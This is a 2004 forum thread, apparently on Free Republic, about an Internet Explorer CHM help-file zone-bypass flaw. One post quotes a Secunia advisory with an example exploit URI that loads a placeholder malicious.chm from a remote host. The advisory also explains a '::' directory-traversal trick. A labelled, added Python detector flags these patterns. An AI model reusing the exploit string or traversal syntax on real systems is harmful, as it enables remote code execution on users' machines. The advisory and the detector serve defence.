US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)
CERT | 04/05/2004 | Art Manion
Posted on 04/08/2004 12:56:30 PM PDT by Salo
Beware.
1
posted on
04/08/2004 12:56:31 PM PDT
by
Salo
To: rdb3; Bush2000; ShadowAce; Ernest_at_the_Beach; TechJunkYard; Swordmaker
Pinging the Penguin Pinger and other interested parties.
2
posted on
04/08/2004 12:58:10 PM PDT
by
Salo
(Revenge is for those too weak to hold a grudge.)
To: All
3
posted on
04/08/2004 12:59:01 PM PDT
by
Support Free Republic
(If Woody had gone straight to the police, this would never have happened!)
To: Salo
Can you or someone please translate this for me?
Carolyn
4
posted on
04/08/2004 12:59:17 PM PDT
by
CDHart
To: Salo
Thank you.
5
posted on
04/08/2004 1:02:14 PM PDT
by
lilylangtree
(Veni, Vidi, Vici)
To: Salo
One of many. Not sure if it's going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).
6
posted on
04/08/2004 1:02:47 PM PDT
by
sigSEGV
To: CDHart
Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.
7
posted on
04/08/2004 1:04:24 PM PDT
by
sigSEGV
To: sigSEGV
Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.
To: TechJunkYard
This is the secunia advisory for the same problem:
Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07
http://secunia.com/advisories/10523/
Critical: Highly critical
Impact: Security Bypass
Where: From remote
Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.
Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.
Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.
However, there exist two problems within the handling of "CHM" files:
1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.
This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.
2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.
Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html
The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.
Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.
Use another product.
Provided and/or discovered by:
Originally reported by Arman Nayyeri.
Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.
Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/
US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070
9
posted on
04/08/2004 1:48:21 PM PDT
by
Salo
(Revenge is for those too weak to hold a grudge.)
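A defender-side check built from the patterns the advisory above names, as an added example that is not part of the original post or of Secunia's advisory: it flags lines of HTML or proxy-log text that use the ITS handlers or showHelp() and labels the two problem cases. The indicator names, `host.example`, and every sample line except the advisory's own example string are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Patterns come from the advisory text above: the two URI handlers, showHelp(),
# the "::" member separator, "..//" traversal, and the "!<remote URL>" fallback.
HANDLER = re.compile(r"(?i)(?:ms-its|mk:@msitstore):")
SHOWHELP = re.compile(r"(?i)\bshowHelp\s*\(")
FALLBACK = re.compile(r"(?i)mhtml:file://[^!\s\"']*!\s*https?://")
MEMBER = re.compile(r"([^\s\"'<>!]+?)::")   # group 1: file opened as a CHM
REMOTE = re.compile(r"(?i)https?://")
TRAVERSAL = re.compile(r"\.\.[/\\]")


def indicators(line):
    """Return the set of indicator names found in one line of HTML or log text."""
    text = unquote(unquote(line))       # undo up to two layers of percent-encoding
    found = set()
    if HANDLER.search(text):
        found.add("its-handler")
    if SHOWHELP.search(text):
        found.add("showhelp-call")
    if not found:
        return found                    # "::" alone (C++, IPv6) is not a signal
    if FALLBACK.search(text):
        found.add("missing-local-file-fallback")   # problem 2 in the advisory
    if TRAVERSAL.search(text):
        found.add("dir-traversal")                 # part of problem 1
    for target in MEMBER.findall(text):
        if REMOTE.search(target):
            found.add("remote-chm")
        if not target.lower().endswith(".chm"):
            found.add("non-chm-opened-as-chm")     # problem 1 in the advisory
    return found


# Constructed sample lines; the first is the advisory's own example string.
SAMPLES = [
    r"ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html",
    r'<script>showHelp("C:\placeholder_dir\..//..//placeholder.tmp::/page.htm")</script>',
    "GET /r?u=mk%3A%40MSITStore%3Ahttp%3A//host.example/a.chm%3A%3A/x.htm",
    r'<a href="ms-its:C:\WINDOWS\Help\example.chm::/topic.htm">help</a>',
    "std::vector<int> v;",
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLES, 1):
        print(n, sorted(indicators(line)))
```

A line that only carries "its-handler" is a link to a local help file, which the advisory describes as normally not a problem; the other labels are the ones worth alerting on.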
To: John Robinson; B Knotts; stainlessbanner; TechJunkYard; ShadowAce; Knitebane; AppyPappy; jae471; ...
The Penguin Ping.
Wanna be Penguified? Just holla!
Got root?
10
posted on
04/08/2004 2:05:22 PM PDT
by
rdb3
(The cornrows are gone, so now they call me "Slim Fadey"... † <><)
To: Salo
This bears repeating:
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs.
Systems Affected
Vendor | Status | Date Updated
Microsoft Corporation | Vulnerable | 5-Apr-2004
References
11
posted on
04/08/2004 3:22:21 PM PDT
by
zeugma
(The Great Experiment is over.)
To: zeugma
This bears repeating: Use a different web browser
In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.
12
posted on
04/08/2004 5:09:04 PM PDT
by
PAR35
To: zeugma
This bears repeating: Use a different web browser
Don't you mean use a different OS??
Linux, OS X, Beos, DOS, Commodore 64??
13
posted on
04/08/2004 6:26:35 PM PDT
by
amigatec
(There are no significant bugs in our software... Maybe you're not using it properly.- Bill Gates)
To: Support Free Republic
Earlier, when I first opened this thread, my Norton intercepted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"
You don't think you're sending this, do you?
14
posted on
04/08/2004 7:17:02 PM PDT
by
ninenot
(Minister of Membership, TomasTorquemadaGentlemen'sClub)
To: sigSEGV
15
posted on
04/09/2004 3:13:17 AM PDT
by
CDHart
To: amigatec
Don't you mean use a different OS??
Linux, OS X, Beos, DOS, Commodore 64??
Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)
16
posted on
04/09/2004 5:59:28 AM PDT
by
zeugma
(The Great Experiment is over.)
To: Salo
Surprise, Surprise, Surprise...
17
posted on
04/09/2004 4:49:05 PM PDT
by
AFreeBird
(your mileage may vary)
To: zeugma
Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.
18
posted on
04/09/2004 4:52:07 PM PDT
by
AFreeBird
(your mileage may vary)
To: rdb3
Now that is an ironic pic!
I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.
A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?
I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).
19
posted on
04/09/2004 5:04:24 PM PDT
by
CyberCowboy777
(We should never ever apologize for who we are, what we believe in, and what we stand for.)
To: sigSEGV
I personally cannot stand my browser and email mixed so I run Firefox at home, but it still is not in a place for me to install it on my clients' systems.
You must remember that many of the exploits of IE are because of the features of IE. Features we use every day that seem simple, but when you are used to them it is hard to do without.
I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)
20
posted on
04/09/2004 5:08:53 PM PDT
by
CyberCowboy777
(We should never ever apologize for who we are, what we believe in, and what we stand for.)